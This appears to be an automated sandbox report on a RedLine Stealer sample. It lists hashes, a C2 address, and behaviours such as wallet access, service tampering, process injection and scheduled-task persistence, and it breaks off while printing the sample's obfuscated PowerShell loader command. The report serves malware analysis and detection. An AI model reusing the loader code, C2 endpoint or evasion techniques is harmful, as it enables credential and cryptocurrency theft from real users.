Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28/01/2023, 19:36
Static task
static1
Behavioral task
behavioral1
Sample
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
Resource
win10v2004-20220812-en
General
-
Target
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
-
Size
361KB
-
MD5
18852c1659b6641a1f4eeacf6ce6bb8d
-
SHA1
1d678410484e34165adb652f7e86a2b5cae5f58d
-
SHA256
34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
-
SHA512
86295df5931e4673fc6579c1d6425040dbf44c6fbd5c19a35228f1c9f8d4917944c8ff020998d4504853398e7640664bf10c275835b1bfa7a236a073ed518b74
-
SSDEEP
6144:lUNamFD8LPUsNuwibRhinAoCRH+SXm+iMvOfcLpp0AdgqMGjEAOe75wBNEj+nc:lUFD8LPaw2RhinATReSXmPMvBBdqZBNU
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/3872-174-0x00000000003E0000-0x0000000000400000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 3716 created 3296 3716 WerFault.exe 56 PID 2384 created 4404 2384 WerFault.exe 61 PID 388 created 4788 388 WerFault.exe 134 PID 2524 created 1812 2524 WerFault.exe 137 -
Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
description pid Process procid_target PID 4224 created 2864 4224 SmartDefRun.exe 54 PID 4224 created 2864 4224 SmartDefRun.exe 54 PID 4224 created 2864 4224 SmartDefRun.exe 54 PID 3568 created 604 3568 powershell.EXE 7 PID 4956 created 3296 4956 svchost.exe 56 PID 4956 created 4404 4956 svchost.exe 61 PID 4956 created 4788 4956 svchost.exe 134 PID 4956 created 1812 4956 svchost.exe 137 -
Blocklisted process makes network request 1 IoCs
flow pid Process 17 4308 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 5 IoCs
pid Process 1692 C4Loader.exe 4788 new2.exe 4876 SysApp.exe 4224 SmartDefRun.exe 3796 fodhelper.exe -
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4304 set thread context of 2548 4304 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 4788 set thread context of 3872 4788 new2.exe 92 PID 4224 set thread context of 208 4224 SmartDefRun.exe 121 PID 3568 set thread context of 3312 3568 powershell.EXE 126 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2136 sc.exe 2836 sc.exe 5088 sc.exe 4924 sc.exe 3660 sc.exe -
Program crash 6 IoCs
pid pid_target Process procid_target 1220 4304 WerFault.exe 79 2356 4788 WerFault.exe 88 4420 3296 WerFault.exe 56 212 4404 WerFault.exe 61 2288 4788 WerFault.exe 134 3460 1812 WerFault.exe 137 -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2472 schtasks.exe 2732 schtasks.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 28 Jan 2023 19:37:49 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4308 powershell.exe 4308 powershell.exe 4876 SysApp.exe 4876 SysApp.exe 4876 SysApp.exe 4876 SysApp.exe 4876 SysApp.exe 4876 SysApp.exe 4876 SysApp.exe 4876 SysApp.exe 4876 SysApp.exe 4876 SysApp.exe 3872 vbc.exe 4224 SmartDefRun.exe 4224 SmartDefRun.exe 4896 powershell.exe 4896 powershell.exe 4224 SmartDefRun.exe 4224 SmartDefRun.exe 4224 SmartDefRun.exe 4224 SmartDefRun.exe 1304 powershell.exe 1304 powershell.exe 4224 SmartDefRun.exe 4224 SmartDefRun.exe 3568 powershell.EXE 4784 powershell.EXE 3568 powershell.EXE 4784 powershell.EXE 3568 powershell.EXE 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 4420 WerFault.exe 4420 WerFault.exe 3312 dllhost.exe 3312 dllhost.exe 212 WerFault.exe 212 WerFault.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe 3312 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2864 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 3872 vbc.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeIncreaseQuotaPrivilege 1304 powershell.exe Token: SeSecurityPrivilege 1304 powershell.exe Token: SeTakeOwnershipPrivilege 1304 powershell.exe Token: SeLoadDriverPrivilege 1304 powershell.exe Token: SeSystemProfilePrivilege 1304 powershell.exe Token: SeSystemtimePrivilege 1304 powershell.exe Token: SeProfSingleProcessPrivilege 1304 powershell.exe Token: SeIncBasePriorityPrivilege 1304 powershell.exe Token: SeCreatePagefilePrivilege 1304 powershell.exe Token: SeBackupPrivilege 1304 powershell.exe Token: SeRestorePrivilege 1304 powershell.exe Token: SeShutdownPrivilege 1304 powershell.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeSystemEnvironmentPrivilege 1304 powershell.exe Token: SeRemoteShutdownPrivilege 1304 powershell.exe Token: SeUndockPrivilege 1304 powershell.exe Token: SeManageVolumePrivilege 1304 powershell.exe Token: 33 1304 powershell.exe Token: 34 1304 powershell.exe Token: 35 1304 powershell.exe Token: 36 1304 powershell.exe Token: SeIncreaseQuotaPrivilege 1304 powershell.exe Token: SeSecurityPrivilege 1304 powershell.exe Token: SeTakeOwnershipPrivilege 1304 powershell.exe Token: SeLoadDriverPrivilege 1304 powershell.exe Token: SeSystemProfilePrivilege 1304 powershell.exe Token: SeSystemtimePrivilege 1304 powershell.exe Token: SeProfSingleProcessPrivilege 1304 powershell.exe Token: SeIncBasePriorityPrivilege 1304 powershell.exe Token: SeCreatePagefilePrivilege 1304 powershell.exe Token: SeBackupPrivilege 1304 powershell.exe Token: SeRestorePrivilege 1304 powershell.exe Token: SeShutdownPrivilege 1304 powershell.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeSystemEnvironmentPrivilege 1304 powershell.exe Token: SeRemoteShutdownPrivilege 1304 powershell.exe Token: SeUndockPrivilege 1304 powershell.exe Token: SeManageVolumePrivilege 1304 powershell.exe Token: 33 1304 powershell.exe Token: 34 1304 powershell.exe Token: 35 1304 powershell.exe Token: 36 1304 powershell.exe Token: SeIncreaseQuotaPrivilege 1304 powershell.exe Token: SeSecurityPrivilege 1304 powershell.exe Token: SeTakeOwnershipPrivilege 1304 powershell.exe Token: SeLoadDriverPrivilege 1304 powershell.exe Token: SeSystemProfilePrivilege 1304 powershell.exe Token: SeSystemtimePrivilege 1304 powershell.exe Token: SeProfSingleProcessPrivilege 1304 powershell.exe Token: SeIncBasePriorityPrivilege 1304 powershell.exe Token: SeCreatePagefilePrivilege 1304 powershell.exe Token: SeBackupPrivilege 1304 powershell.exe Token: SeRestorePrivilege 1304 powershell.exe Token: SeShutdownPrivilege 1304 powershell.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeSystemEnvironmentPrivilege 1304 powershell.exe Token: SeRemoteShutdownPrivilege 1304 powershell.exe Token: SeUndockPrivilege 1304 powershell.exe Token: SeManageVolumePrivilege 1304 powershell.exe Token: 33 1304 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4304 wrote to memory of 2548 4304 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 4304 wrote to memory of 2548 4304 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 4304 wrote to memory of 2548 4304 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 4304 wrote to memory of 2548 4304 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 4304 wrote to memory of 2548 4304 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 2548 wrote to memory of 4308 2548 vbc.exe 85 PID 2548 wrote to memory of 4308 2548 vbc.exe 85 PID 2548 wrote to memory of 4308 2548 vbc.exe 85 PID 4308 wrote to memory of 1692 4308 powershell.exe 87 PID 4308 wrote to memory of 1692 4308 powershell.exe 87 PID 4308 wrote to memory of 1692 4308 powershell.exe 87 PID 4308 wrote to memory of 4788 4308 powershell.exe 88 PID 4308 wrote to memory of 4788 4308 powershell.exe 88 PID 4308 wrote to memory of 4788 4308 powershell.exe 88 PID 4308 wrote to memory of 4876 4308 powershell.exe 90 PID 4308 wrote to memory of 4876 4308 powershell.exe 90 PID 4308 wrote to memory of 4876 4308 powershell.exe 90 PID 4308 wrote to memory of 4224 4308 powershell.exe 91 PID 4308 wrote to memory of 4224 4308 powershell.exe 91 PID 4788 wrote to memory of 3872 4788 new2.exe 92 PID 4788 wrote to memory of 3872 4788 new2.exe 92 PID 4788 wrote to memory of 3872 4788 new2.exe 92 PID 4788 wrote to memory of 3872 4788 new2.exe 92 PID 4788 wrote to memory of 3872 4788 new2.exe 92 PID 5052 wrote to memory of 2136 5052 cmd.exe 110 PID 5052 wrote to memory of 2136 5052 cmd.exe 110 PID 5052 wrote to memory of 2836 5052 cmd.exe 111 PID 5052 wrote to memory of 2836 5052 cmd.exe 111 PID 5052 wrote to memory of 5088 5052 cmd.exe 112 PID 5052 wrote to memory of 5088 5052 cmd.exe 112 PID 5052 wrote to memory of 4924 5052 cmd.exe 113 PID 5052 wrote to memory of 4924 5052 cmd.exe 113 PID 5052 wrote to memory of 3660 5052 cmd.exe 114 PID 5052 wrote to memory of 3660 5052 cmd.exe 114 PID 5052 wrote to memory of 4280 5052 cmd.exe 116 PID 5052 wrote to memory of 4280 5052 cmd.exe 116 PID 5052 wrote to memory of 1980 5052 cmd.exe 117 PID 5052 wrote to memory of 1980 5052 cmd.exe 117 PID 5052 wrote to memory of 2156 5052 cmd.exe 118 PID 5052 wrote to memory of 2156 5052 cmd.exe 118 PID 5052 wrote to memory of 4420 5052 cmd.exe 119 PID 5052 wrote to memory of 4420 5052 cmd.exe 119 PID 5052 wrote to memory of 1988 5052 cmd.exe 120 PID 5052 wrote to memory of 1988 5052 cmd.exe 120 PID 4224 wrote to memory of 208 4224 SmartDefRun.exe 121 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3568 wrote to memory of 3312 3568 powershell.EXE 126 PID 3312 wrote to memory of 604 3312 dllhost.exe 7 PID 3312 wrote to memory of 656 3312 dllhost.exe 6 PID 3312 wrote to memory of 940 3312 dllhost.exe 15 PID 3312 wrote to memory of 1020 3312 dllhost.exe 11 PID 3312 wrote to memory of 432 3312 dllhost.exe 12 PID 3312 wrote to memory of 744 3312 dllhost.exe 13 PID 3312 wrote to memory of 504 3312 dllhost.exe 14 PID 3312 wrote to memory of 1028 3312 dllhost.exe 16 PID 3312 wrote to memory of 1124 3312 dllhost.exe 19 PID 3312 wrote to memory of 1168 3312 dllhost.exe 20
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:656
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:604
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1020
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{08fd132a-ab62-410b-aeff-5b11da57393e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3312
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1124 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:cCHcvGcBwjJw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KdkHgIutiJfaVm,[Parameter(Position=1)][Type]$xSPgdnCcGk)$OroBywbudQa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'mo'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'T'+'y'+''+'p'+''+'e'+'',''+'C'+''+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+',Ans'+[Char](105)+'C'+[Char](108)+''+'a'+''+'s'+'s'+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$OroBywbudQa.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+'i'+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'Hi'+[Char](100)+''+'e'+'B'+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$KdkHgIutiJfaVm).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+[Char](103)+'ed');$OroBywbudQa.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+',N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$xSPgdnCcGk,$KdkHgIutiJfaVm).SetImpleme